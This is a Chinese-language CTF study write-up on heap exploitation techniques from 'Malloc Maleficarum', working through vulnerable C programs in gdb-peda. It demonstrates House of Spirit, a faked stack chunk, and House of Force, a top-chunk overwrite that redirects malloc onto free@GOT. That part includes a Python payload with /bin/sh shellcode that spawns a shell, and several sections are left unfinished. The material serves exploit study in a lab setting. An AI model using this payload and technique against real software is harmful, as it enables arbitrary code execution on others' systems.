Malloc-Maleficarum-复盘

CTF

1.HOS

伪造堆块,最终malloc()分配到栈上的空间。

这份源码来自这里
但是我这边复现他这个有点问题,原因应该是gcc版本的问题,只是为了搞明白原理,直接gdb里暴力set value就可以了。
这里附上gdb的调试过程。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
# muhe @ ubuntu in ~/Desktop/study [2:54:31] 
$ ls
hos  hos.c
# muhe @ ubuntu in ~/Desktop/study [2:54:33] 
$ cat hos.c 
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void fvuln(char *str1, int age)
{
  char *ptr1;
  int local_age;
  char name[32];
  char *ptr2;
  local_age = age;
  ptr1 = (char *) malloc(256);
  printf("\nPTR1 = [ %p ]", ptr1);
  strcpy(name, str1);
  printf("\nPTR1 = [ %p ]\n", ptr1);
  free(ptr1);
  ptr2 = (char *) malloc(40);
  snprintf(ptr2, 40-1, "%s is %d years old", name, local_age);
  printf("\n%s\n", ptr2);
}
int main(int argc, char *argv[])
{
  int pad[10] = {0, 0, 0, 0, 0, 0, 0, 10, 0, 0};
  if (argc == 3)
    fvuln(argv[1], atoi(argv[2]));
  return 0;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
# muhe @ ubuntu in ~/Desktop/study [2:54:35] 
$ gcc hos.c -m32 -fno-stack-protector -mpreferred-stack-boundary=2 -mno-accumulate-outgoing-args -z execstack -o hos -g
# muhe @ ubuntu in ~/Desktop/study [2:54:45] 
$ gdb ./hos -q
Reading symbols from ./hos...done.
gdb-peda$ pdisass fvuln
Dump of assembler code for function fvuln:
   0x080484fb <+0>:	push   ebp
   0x080484fc <+1>:	mov    ebp,esp
   0x080484fe <+3>:	sub    esp,0x2c
   0x08048501 <+6>:	mov    eax,DWORD PTR [ebp+0xc]
   0x08048504 <+9>:	mov    DWORD PTR [ebp-0x4],eax
   0x08048507 <+12>:	push   0x100
   0x0804850c <+17>:	call   0x80483b0 <malloc@plt>
   0x08048511 <+22>:	add    esp,0x4
   0x08048514 <+25>:	mov    DWORD PTR [ebp-0x8],eax
   0x08048517 <+28>:	push   DWORD PTR [ebp-0x8]
   0x0804851a <+31>:	push   0x8048660
   0x0804851f <+36>:	call   0x8048380 <printf@plt>
   0x08048524 <+41>:	add    esp,0x8
   0x08048527 <+44>:	push   DWORD PTR [ebp+0x8]
   0x0804852a <+47>:	lea    eax,[ebp-0x2c]
   0x0804852d <+50>:	push   eax
   0x0804852e <+51>:	call   0x80483a0 <strcpy@plt>
   0x08048533 <+56>:	add    esp,0x8
   0x08048536 <+59>:	push   DWORD PTR [ebp-0x8]
   0x08048539 <+62>:	push   0x804866f
   0x0804853e <+67>:	call   0x8048380 <printf@plt>
   0x08048543 <+72>:	add    esp,0x8
   0x08048546 <+75>:	push   DWORD PTR [ebp-0x8]
   0x08048549 <+78>:	call   0x8048390 <free@plt>
   0x0804854e <+83>:	add    esp,0x4
   0x08048551 <+86>:	push   0x28
   0x08048553 <+88>:	call   0x80483b0 <malloc@plt>
   0x08048558 <+93>:	add    esp,0x4
   0x0804855b <+96>:	mov    DWORD PTR [ebp-0xc],eax
   0x0804855e <+99>:	push   DWORD PTR [ebp-0x4]
   0x08048561 <+102>:	lea    eax,[ebp-0x2c]
   0x08048564 <+105>:	push   eax
   0x08048565 <+106>:	push   0x804867f
   0x0804856a <+111>:	push   0x27
   0x0804856c <+113>:	push   DWORD PTR [ebp-0xc]
   0x0804856f <+116>:	call   0x80483d0 <snprintf@plt>
   0x08048574 <+121>:	add    esp,0x14
   0x08048577 <+124>:	push   DWORD PTR [ebp-0xc]
   0x0804857a <+127>:	push   0x8048692
   0x0804857f <+132>:	call   0x8048380 <printf@plt>
   0x08048584 <+137>:	add    esp,0x8
   0x08048587 <+140>:	nop
   0x08048588 <+141>:	leave  
   0x08048589 <+142>:	ret    
End of assembler dump.
gdb-peda$ b *0x0804850c
Breakpoint 1 at 0x804850c: file hos.c, line 14.
gdb-peda$ b *0x0804852e
Breakpoint 2 at 0x804852e: file hos.c, line 16.
gdb-peda$ b *0x08048549
Breakpoint 3 at 0x8048549: file hos.c, line 19.
gdb-peda$ b *0x08048553
Breakpoint 4 at 0x8048553: file hos.c, line 21.
gdb-peda$ r aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccc 20
Starting program: /home/muhe/Desktop/study/hos aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccc 20
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
 [----------------------------------registers-----------------------------------]
EAX: 0x14 
EBX: 0x0 
ECX: 0x0 
EDX: 0x14 
ESI: 0xf7fb9000 --> 0x1aedb0 
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0 
EBP: 0xffffd54c --> 0xffffd588 --> 0x0 
ESP: 0xffffd51c --> 0x100 
EIP: 0x804850c (<fvuln+17>:	call   0x80483b0 <malloc@plt>)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048501 <fvuln+6>:	mov    eax,DWORD PTR [ebp+0xc]
   0x8048504 <fvuln+9>:	mov    DWORD PTR [ebp-0x4],eax
   0x8048507 <fvuln+12>:	push   0x100
=> 0x804850c <fvuln+17>:	call   0x80483b0 <malloc@plt>
   0x8048511 <fvuln+22>:	add    esp,0x4
   0x8048514 <fvuln+25>:	mov    DWORD PTR [ebp-0x8],eax
   0x8048517 <fvuln+28>:	push   DWORD PTR [ebp-0x8]
   0x804851a <fvuln+31>:	push   0x8048660
Guessed arguments:
arg[0]: 0x100 
arg[1]: 0x0 
[------------------------------------stack-------------------------------------]
0000| 0xffffd51c --> 0x100 
0004| 0xffffd520 --> 0x0 
0008| 0xffffd524 --> 0xffffd5c4 --> 0x61b64d7e 
0012| 0xffffd528 --> 0xf7fe76db (add    esi,0x15925)
0016| 0xffffd52c --> 0x0 
0020| 0xffffd530 --> 0xf7e39c45 (<strtol+5>:	add    eax,0x17f3bb)
0024| 0xffffd534 --> 0xf7e37040 (<atoi+16>:	add    esp,0x1c)
0028| 0xffffd538 --> 0xffffd851 --> 0x58003032 ('20')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x0804850c in fvuln (str1=0xffffd828 'a' <repeats 32 times>, "bbbbcccc", age=0x14) at hos.c:14
14	  ptr1 = (char *) malloc(256);
gdb-peda$ c
Continuing.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
[----------------------------------registers-----------------------------------]
EAX: 0xffffd520 --> 0x0 
EBX: 0x0 
ECX: 0x7fffffec 
EDX: 0xf7fba870 --> 0x0 
ESI: 0xf7fb9000 --> 0x1aedb0 
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0 
EBP: 0xffffd54c --> 0xffffd588 --> 0x0 
ESP: 0xffffd518 --> 0xffffd520 --> 0x0 
EIP: 0x804852e (<fvuln+51>:	call   0x80483a0 <strcpy@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048527 <fvuln+44>:	push   DWORD PTR [ebp+0x8]
   0x804852a <fvuln+47>:	lea    eax,[ebp-0x2c]
   0x804852d <fvuln+50>:	push   eax
=> 0x804852e <fvuln+51>:	call   0x80483a0 <strcpy@plt>
   0x8048533 <fvuln+56>:	add    esp,0x8
   0x8048536 <fvuln+59>:	push   DWORD PTR [ebp-0x8]
   0x8048539 <fvuln+62>:	push   0x804866f
   0x804853e <fvuln+67>:	call   0x8048380 <printf@plt>
Guessed arguments:
arg[0]: 0xffffd520 --> 0x0 
arg[1]: 0xffffd828 ('a' <repeats 32 times>, "bbbbcccc")
[------------------------------------stack-------------------------------------]
0000| 0xffffd518 --> 0xffffd520 --> 0x0 
0004| 0xffffd51c --> 0xffffd828 ('a' <repeats 32 times>, "bbbbcccc")
0008| 0xffffd520 --> 0x0 
0012| 0xffffd524 --> 0xffffd5c4 --> 0x61b64d7e 
0016| 0xffffd528 --> 0xf7fe76db (add    esi,0x15925)
0020| 0xffffd52c --> 0x0 
0024| 0xffffd530 --> 0xf7e39c45 (<strtol+5>:	add    eax,0x17f3bb)
0028| 0xffffd534 --> 0xf7e37040 (<atoi+16>:	add    esp,0x1c)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 2, 0x0804852e in fvuln (str1=0xffffd828 'a' <repeats 32 times>, "bbbbcccc", age=0x14) at hos.c:16
16	  strcpy(name, str1);
gdb-peda$ c
Continuing.
PTR1 = [ 0x804b008 ]
PTR1 = [ 0x63636363 ]

这里伪造堆块,但是为了过malloc()对fastbin的check,所以需要再设置下下一个块。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
 [----------------------------------registers-----------------------------------]
EAX: 0x17 
EBX: 0x0 
ECX: 0x7fffffeb 
EDX: 0xf7fba870 --> 0x0 
ESI: 0xf7fb9000 --> 0x1aedb0 
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0 
EBP: 0xffffd54c --> 0xffffd588 --> 0x0 
ESP: 0xffffd51c ("cccc", 'a' <repeats 32 times>, "bbbbcccc")
EIP: 0x8048549 (<fvuln+78>:	call   0x8048390 <free@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804853e <fvuln+67>:	call   0x8048380 <printf@plt>
   0x8048543 <fvuln+72>:	add    esp,0x8
   0x8048546 <fvuln+75>:	push   DWORD PTR [ebp-0x8]
=> 0x8048549 <fvuln+78>:	call   0x8048390 <free@plt>
   0x804854e <fvuln+83>:	add    esp,0x4
   0x8048551 <fvuln+86>:	push   0x28
   0x8048553 <fvuln+88>:	call   0x80483b0 <malloc@plt>
   0x8048558 <fvuln+93>:	add    esp,0x4
Guessed arguments:
arg[0]: 0x63636363 ('cccc')
[------------------------------------stack-------------------------------------]
0000| 0xffffd51c ("cccc", 'a' <repeats 32 times>, "bbbbcccc")
0004| 0xffffd520 ('a' <repeats 32 times>, "bbbbcccc")
0008| 0xffffd524 ('a' <repeats 28 times>, "bbbbcccc")
0012| 0xffffd528 ('a' <repeats 24 times>, "bbbbcccc")
0016| 0xffffd52c ('a' <repeats 20 times>, "bbbbcccc")
0020| 0xffffd530 ('a' <repeats 16 times>, "bbbbcccc")
0024| 0xffffd534 ('a' <repeats 12 times>, "bbbbcccc")
0028| 0xffffd538 ("aaaaaaaabbbbcccc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 3, 0x08048549 in fvuln (str1=0xffffd828 'a' <repeats 32 times>, "bbbbcccc", age=0x14) at hos.c:19
19	  free(ptr1);
gdb-peda$ x/10wx $esp
0xffffd51c:	0x63636363	0x61616161	0x61616161	0x61616161
0xffffd52c:	0x61616161	0x61616161	0x61616161	0x61616161
0xffffd53c:	0x61616161	0x62626262
gdb-peda$ set *(int*)0xffffd51c = 0xffffd530
gdb-peda$ x/10wx 0xffffd530 - 8
0xffffd528:	0x61616161	0x61616161	0x61616161	0x61616161
0xffffd538:	0x61616161	0x61616161	0x62626262	0x63636363
0xffffd548:	0x00000000	0xffffd588
gdb-peda$ set *(int*)0xffffd528=0x0
gdb-peda$ set *(int*)0xffffd52c=0x31
gdb-peda$ x/10wx 0xffffd530 - 8 + 0x30
0xffffd558:	0x00000014	0x00000000	0x00000000	0x00000000
0xffffd568:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffd578:	0x0000000a	0x00000000
gdb-peda$ set *(int*)0xffffd558 = 0x31
gdb-peda$ set *(int*)0xffffd55c = 0x30
gdb-peda$ ni
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
 [----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x0 
ECX: 0xf7fb9000 --> 0x1aedb0 
EDX: 0x0 
ESI: 0xf7fb9000 --> 0x1aedb0 
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0 
EBP: 0xffffd54c --> 0xffffd588 --> 0x0 
ESP: 0xffffd51c --> 0xffffd530 --> 0x0 
EIP: 0x804854e (<fvuln+83>:	add    esp,0x4)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048543 <fvuln+72>:	add    esp,0x8
   0x8048546 <fvuln+75>:	push   DWORD PTR [ebp-0x8]
   0x8048549 <fvuln+78>:	call   0x8048390 <free@plt>
=> 0x804854e <fvuln+83>:	add    esp,0x4
   0x8048551 <fvuln+86>:	push   0x28
   0x8048553 <fvuln+88>:	call   0x80483b0 <malloc@plt>
   0x8048558 <fvuln+93>:	add    esp,0x4
   0x804855b <fvuln+96>:	mov    DWORD PTR [ebp-0xc],eax
[------------------------------------stack-------------------------------------]
0000| 0xffffd51c --> 0xffffd530 --> 0x0 
0004| 0xffffd520 ("aaaaaaaa")
0008| 0xffffd524 ("aaaa")
0012| 0xffffd528 --> 0x0 
0016| 0xffffd52c --> 0x31 ('1')
0020| 0xffffd530 --> 0x0 
0024| 0xffffd534 ('a' <repeats 12 times>, "bbbbcccc")
0028| 0xffffd538 ("aaaaaaaabbbbcccc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0804854e	19	  free(ptr1);
gdb-peda$ ni
 [----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x0 
ECX: 0xf7fb9000 --> 0x1aedb0 
EDX: 0x0 
ESI: 0xf7fb9000 --> 0x1aedb0 
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0 
EBP: 0xffffd54c --> 0xffffd588 --> 0x0 
ESP: 0xffffd520 ("aaaaaaaa")
EIP: 0x8048551 (<fvuln+86>:	push   0x28)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048546 <fvuln+75>:	push   DWORD PTR [ebp-0x8]
   0x8048549 <fvuln+78>:	call   0x8048390 <free@plt>
   0x804854e <fvuln+83>:	add    esp,0x4
=> 0x8048551 <fvuln+86>:	push   0x28
   0x8048553 <fvuln+88>:	call   0x80483b0 <malloc@plt>
   0x8048558 <fvuln+93>:	add    esp,0x4
   0x804855b <fvuln+96>:	mov    DWORD PTR [ebp-0xc],eax
   0x804855e <fvuln+99>:	push   DWORD PTR [ebp-0x4]
[------------------------------------stack-------------------------------------]
0000| 0xffffd520 ("aaaaaaaa")
0004| 0xffffd524 ("aaaa")
0008| 0xffffd528 --> 0x0 
0012| 0xffffd52c --> 0x31 ('1')
0016| 0xffffd530 --> 0x0 
0020| 0xffffd534 ('a' <repeats 12 times>, "bbbbcccc")
0024| 0xffffd538 ("aaaaaaaabbbbcccc")
0028| 0xffffd53c ("aaaabbbbcccc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
21	  ptr2 = (char *) malloc(40);
gdb-peda$ ni
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x0 
ECX: 0xf7fb9000 --> 0x1aedb0 
EDX: 0x0 
ESI: 0xf7fb9000 --> 0x1aedb0 
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0 
EBP: 0xffffd54c --> 0xffffd588 --> 0x0 
ESP: 0xffffd51c --> 0x28 ('(')
EIP: 0x8048553 (<fvuln+88>:	call   0x80483b0 <malloc@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048549 <fvuln+78>:	call   0x8048390 <free@plt>
   0x804854e <fvuln+83>:	add    esp,0x4
   0x8048551 <fvuln+86>:	push   0x28
=> 0x8048553 <fvuln+88>:	call   0x80483b0 <malloc@plt>
   0x8048558 <fvuln+93>:	add    esp,0x4
   0x804855b <fvuln+96>:	mov    DWORD PTR [ebp-0xc],eax
   0x804855e <fvuln+99>:	push   DWORD PTR [ebp-0x4]
   0x8048561 <fvuln+102>:	lea    eax,[ebp-0x2c]
Guessed arguments:
arg[0]: 0x28 ('(')
[------------------------------------stack-------------------------------------]
0000| 0xffffd51c --> 0x28 ('(')
0004| 0xffffd520 ("aaaaaaaa")
0008| 0xffffd524 ("aaaa")
0012| 0xffffd528 --> 0x0 
0016| 0xffffd52c --> 0x31 ('1')
0020| 0xffffd530 --> 0x0 
0024| 0xffffd534 ('a' <repeats 12 times>, "bbbbcccc")
0028| 0xffffd538 ("aaaaaaaabbbbcccc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 4, 0x08048553 in fvuln (str1=0xffffd828 'a' <repeats 32 times>, "bbbbcccc", age=0x31) at hos.c:21
21	  ptr2 = (char *) malloc(40);
gdb-peda$ ni

这里,分配到了栈上的地址。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
 [----------------------------------registers-----------------------------------]
EAX: 0xffffd530 --> 0x0 
EBX: 0x0 
ECX: 0xf7fb9780 --> 0x0 
EDX: 0xffffd530 --> 0x0 
ESI: 0xf7fb9000 --> 0x1aedb0 
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0 
EBP: 0xffffd54c --> 0xffffd588 --> 0x0 
ESP: 0xffffd51c --> 0x28 ('(')
EIP: 0x8048558 (<fvuln+93>:	add    esp,0x4)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804854e <fvuln+83>:	add    esp,0x4
   0x8048551 <fvuln+86>:	push   0x28
   0x8048553 <fvuln+88>:	call   0x80483b0 <malloc@plt>
=> 0x8048558 <fvuln+93>:	add    esp,0x4
   0x804855b <fvuln+96>:	mov    DWORD PTR [ebp-0xc],eax
   0x804855e <fvuln+99>:	push   DWORD PTR [ebp-0x4]
   0x8048561 <fvuln+102>:	lea    eax,[ebp-0x2c]
   0x8048564 <fvuln+105>:	push   eax
[------------------------------------stack-------------------------------------]
0000| 0xffffd51c --> 0x28 ('(')
0004| 0xffffd520 ("aaaaaaaa")
0008| 0xffffd524 ("aaaa")
0012| 0xffffd528 --> 0x0 
0016| 0xffffd52c --> 0x31 ('1')
0020| 0xffffd530 --> 0x0 
0024| 0xffffd534 ('a' <repeats 12 times>, "bbbbcccc")
0028| 0xffffd538 ("aaaaaaaabbbbcccc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048558	21	  ptr2 = (char *) malloc(40);
gdb-peda$ ni
 [----------------------------------registers-----------------------------------]
EAX: 0xffffd530 --> 0x0 
EBX: 0x0 
ECX: 0xf7fb9780 --> 0x0 
EDX: 0xffffd530 --> 0x0 
ESI: 0xf7fb9000 --> 0x1aedb0 
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0 
EBP: 0xffffd54c --> 0xffffd588 --> 0x0 
ESP: 0xffffd520 ("aaaaaaaa")
EIP: 0x804855b (<fvuln+96>:	mov    DWORD PTR [ebp-0xc],eax)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048551 <fvuln+86>:	push   0x28
   0x8048553 <fvuln+88>:	call   0x80483b0 <malloc@plt>
   0x8048558 <fvuln+93>:	add    esp,0x4
=> 0x804855b <fvuln+96>:	mov    DWORD PTR [ebp-0xc],eax
   0x804855e <fvuln+99>:	push   DWORD PTR [ebp-0x4]
   0x8048561 <fvuln+102>:	lea    eax,[ebp-0x2c]
   0x8048564 <fvuln+105>:	push   eax
   0x8048565 <fvuln+106>:	push   0x804867f
[------------------------------------stack-------------------------------------]
0000| 0xffffd520 ("aaaaaaaa")
0004| 0xffffd524 ("aaaa")
0008| 0xffffd528 --> 0x0 
0012| 0xffffd52c --> 0x31 ('1')
0016| 0xffffd530 --> 0x0 
0020| 0xffffd534 ('a' <repeats 12 times>, "bbbbcccc")
0024| 0xffffd538 ("aaaaaaaabbbbcccc")
0028| 0xffffd53c ("aaaabbbbcccc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0804855b	21	  ptr2 = (char *) malloc(40);
gdb-peda$

2.hop TBU

3.hom TBU

4.hof
控制top chunk的size字段,再之后的两次malloc()之后,分配到指定的位置。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
/*
House of force vulnerable program. 
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h> 
int main(int argc, char *argv[])
{
        char *buf1, *buf2, *buf3;
        if (argc != 4) {
                printf("Usage Error\n");
                return;
        }
        [1]buf1 = malloc(256);
        [2]strcpy(buf1, argv[1]); /* Prereq 1 */
        [3]buf2 = malloc(strtoul(argv[2], NULL, 16)); /* Prereq 2 */
        [4]buf3 = malloc(256); /* Prereq 3 */
        [5]strcpy(buf3, argv[3]); /* Prereq 3 */
        [6]free(buf3);
        free(buf2);
        free(buf1);
        return 0;
}
/* 
free@got entry  0x08049830
top             0x0804a108
size = ((0x08049830 - 0x8) - 0x0804a108) -0x8 = 0xFFFFF718
python -c 'print "A"*260 + "\xff\xff\xff\xff" +" "+"0xFFFFF718"+" "+"AAAA"' > 1
control eip --> 0x41414141
*/

gdb log如下
分配到了free@got

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
 [----------------------------------registers-----------------------------------]
EAX: 0x8049830 --> 0x8048346 (<free@plt+6>:	push   0x0)
EBX: 0xffffd340 --> 0x4 
ECX: 0xf7fb9780 --> 0x0 
EDX: 0x8049830 --> 0x8048346 (<free@plt+6>:	push   0x0)
ESI: 0xf7fb9000 --> 0x1aedb0 
EDI: 0xf7fb9000 --> 0x1aedb0 
EBP: 0xffffd328 --> 0x0 
ESP: 0xffffd310 --> 0x4 
EIP: 0x804853f (<main+148>:	mov    DWORD PTR [ebp-0xc],eax)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048532 <main+135>:	push   0x100
   0x8048537 <main+140>:	call   0x8048360 <malloc@plt>
   0x804853c <main+145>:	add    esp,0x10
=> 0x804853f <main+148>:	mov    DWORD PTR [ebp-0xc],eax
   0x8048542 <main+151>:	mov    eax,DWORD PTR [ebx+0x4]
   0x8048545 <main+154>:	add    eax,0xc
   0x8048548 <main+157>:	mov    eax,DWORD PTR [eax]
   0x804854a <main+159>:	sub    esp,0x8
[------------------------------------stack-------------------------------------]
0000| 0xffffd310 --> 0x4 
0004| 0xffffd314 --> 0x804a008 ('A' <repeats 200 times>...)
0008| 0xffffd318 --> 0x804a110 --> 0x0 
0012| 0xffffd31c --> 0x80485c1 (<__libc_csu_init+33>:	lea    eax,[ebx-0xf8])
0016| 0xffffd320 --> 0xffffd340 --> 0x4 
0020| 0xffffd324 --> 0x0 
0024| 0xffffd328 --> 0x0 
0028| 0xffffd32c --> 0xf7e22637 (<__libc_start_main+247>:	add    esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0804853f	18	        buf3 = malloc(256); /* Prereq 3 */
gdb-peda$

到后面strcpy()之后

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
 [----------------------------------registers-----------------------------------]
EAX: 0x8049830 ("AAAA")
EBX: 0xffffd340 --> 0x4 
ECX: 0xffffd722 ("AAAA")
EDX: 0x8049830 ("AAAA")
ESI: 0xf7fb9000 --> 0x1aedb0 
EDI: 0xf7fb9000 --> 0x1aedb0 
EBP: 0xffffd328 --> 0x0 
ESP: 0xffffd2fc --> 0x8048564 (<main+185>:	add    esp,0x10)
EIP: 0x41414141 ('AAAA')
EFLAGS: 0x10292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41414141
[------------------------------------stack-------------------------------------]
0000| 0xffffd2fc --> 0x8048564 (<main+185>:	add    esp,0x10)
0004| 0xffffd300 --> 0x8049830 ("AAAA")
0008| 0xffffd304 --> 0xffffd722 ("AAAA")
0012| 0xffffd308 --> 0x10 
0016| 0xffffd30c --> 0x80485eb (<__libc_csu_init+75>:	add    edi,0x1)
0020| 0xffffd310 --> 0x4 
0024| 0xffffd314 --> 0x804a008 ('A' <repeats 200 times>...)
0028| 0xffffd318 --> 0x804a110 --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41414141 in ?? ()
gdb-peda$

该变下payload

1
2
3
4
5
6
7
8
9
shellcode =  "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
shellcode += "\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0"
shellcode += "\x0b\xcd\x80"
payload = ""
payload += "\x90"*10 + shellcode + "A"*(260-10-len(shellcode))
payload += "\xff\xff\xff\xff"
payload += " " + "0xFFFFF718"
payload += " " + "\x08\xa0\x04\x08"
print payload

gdb log这边

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
[----------------------------------registers-----------------------------------]
EAX: 0x8049830 --> 0x804a008 --> 0x90909090 
EBX: 0xffffd340 --> 0x4 
ECX: 0xffffd721 --> 0x804a008 --> 0x90909090 
EDX: 0x8049830 --> 0x804a008 --> 0x90909090 
ESI: 0xf7fb9000 --> 0x1aedb0 
EDI: 0xf7fb9000 --> 0x1aedb0 
EBP: 0xffffd328 --> 0x0 
ESP: 0xffffd300 --> 0x8049830 --> 0x804a008 --> 0x90909090 
EIP: 0x804855f (<main+180>:	call   0x8048340 <free@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048556 <main+171>:	add    esp,0x10
   0x8048559 <main+174>:	sub    esp,0xc
   0x804855c <main+177>:	push   DWORD PTR [ebp-0xc]
=> 0x804855f <main+180>:	call   0x8048340 <free@plt>
   0x8048564 <main+185>:	add    esp,0x10
   0x8048567 <main+188>:	sub    esp,0xc
   0x804856a <main+191>:	push   DWORD PTR [ebp-0x10]
   0x804856d <main+194>:	call   0x8048340 <free@plt>
Guessed arguments:
arg[0]: 0x8049830 --> 0x804a008 --> 0x90909090 
[------------------------------------stack-------------------------------------]
0000| 0xffffd300 --> 0x8049830 --> 0x804a008 --> 0x90909090 
0004| 0xffffd304 --> 0xffffd721 --> 0x804a008 --> 0x90909090 
0008| 0xffffd308 --> 0x10 
0012| 0xffffd30c --> 0x80485eb (<__libc_csu_init+75>:	add    edi,0x1)
0016| 0xffffd310 --> 0x4 
0020| 0xffffd314 --> 0x804a008 --> 0x90909090 
0024| 0xffffd318 --> 0x804a110 --> 0x0 
0028| 0xffffd31c --> 0x8049830 --> 0x804a008 --> 0x90909090 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0804855f	21	        free(buf3);
gdb-peda$ pdisass 0x8048340
Dump of assembler code from 0x8048340 to 0x8048360::	Dump of assembler code from 0x8048340 to 0x8048360:
   0x08048340 <free@plt+0>:	jmp    DWORD PTR ds:0x8049830
   0x08048346 <free@plt+6>:	push   0x0
   0x0804834b <free@plt+11>:	jmp    0x8048330
   0x08048350 <strcpy@plt+0>:	jmp    DWORD PTR ds:0x8049834
   0x08048356 <strcpy@plt+6>:	push   0x8
   0x0804835b <strcpy@plt+11>:	jmp    0x8048330
End of assembler dump.
gdb-peda$ pdisass 0x804a008
Dump of assembler code from 0x804a008 to 0x804a028::	Dump of assembler code from 0x804a008 to 0x804a028:
   0x0804a008:	nop
   0x0804a009:	nop
   0x0804a00a:	nop
   0x0804a00b:	nop
   0x0804a00c:	nop
   0x0804a00d:	nop
   0x0804a00e:	nop
   0x0804a00f:	nop
   0x0804a010:	nop
   0x0804a011:	nop
   0x0804a012:	xor    eax,eax
   0x0804a014:	push   eax
   0x0804a015:	push   0x68732f2f
   0x0804a01a:	push   0x6e69622f
   0x0804a01f:	mov    ebx,esp
   0x0804a021:	push   eax
   0x0804a022:	mov    edx,esp
   0x0804a024:	push   ebx
   0x0804a025:	mov    ecx,esp
   0x0804a027:	mov    al,0xb
End of assembler dump.
gdb-peda$ c
Continuing.
process 9711 is executing new program: /bin/dash
Error in re-setting breakpoint 1: Function "main" not defined.
$

5.hol TBU

6.hoc TBU